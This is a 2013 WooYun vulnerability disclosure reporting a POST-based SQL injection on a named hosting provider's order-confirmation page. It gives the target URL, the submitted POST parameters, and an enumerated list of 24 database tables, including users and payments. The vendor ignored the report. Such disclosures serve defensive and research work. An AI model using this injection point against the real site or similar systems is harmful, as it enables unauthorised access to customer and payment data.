专注IDC三十天#易联主机POST SQL注入 | wooyun-2013-040379

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-040379

漏洞标题：

专注IDC三十天#易联主机POST SQL注入

漏洞详情

披露状态：

2013-10-21：细节已通知厂商并且等待厂商处理中
2013-10-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

RT
持续上一个SQL注入
再来一发POST 型的。

详细说明：

地址：http://www.elinkhost.com/confirm/
提交的数据v_cid=Pro1G&v_oid=H&v_rcvname=11214778&v_rcvnum=11214778&v_rcvtel=11214778&v_rcvmobile=11214778&v_rcvqq=11214778&v_rcvaddr=11214778&v_rcvid=11214778&v_rcvemail=11214778&v_rcvdns=11214778&v_amount=600&v_buyyear=1&code=11214778&remark2=11214778&gift_card=11214778

Database: elinkhost_data
[24 tables]
+-----------------------+
| ss_article_categories |
| ss_articles           |
| ss_attachments        |
| ss_banners            |
| ss_feedbacks          |
| ss_giftcard           |
| ss_invoices           |
| ss_links              |
| ss_page_categories    |
| ss_pages              |
| ss_paycode            |
| ss_payments           |
| ss_product_categories |
| ss_products           |
| ss_searchindex        |
| ss_servers            |
| ss_serverusers        |
| ss_sessions           |
| ss_settings           |
| ss_statistics         |
| ss_tags               |
| ss_todo               |
| ss_tuoguan            |
| ss_users              |
+-----------------------+

剩下的同上一个漏洞。。

漏洞证明：

见详细说明。

修复方案：

过滤上面的一些参数。

版权声明：转载请注明来源 m1x7e1@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-10-26 18:52

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 m1x7e1@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 m1x7e1@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞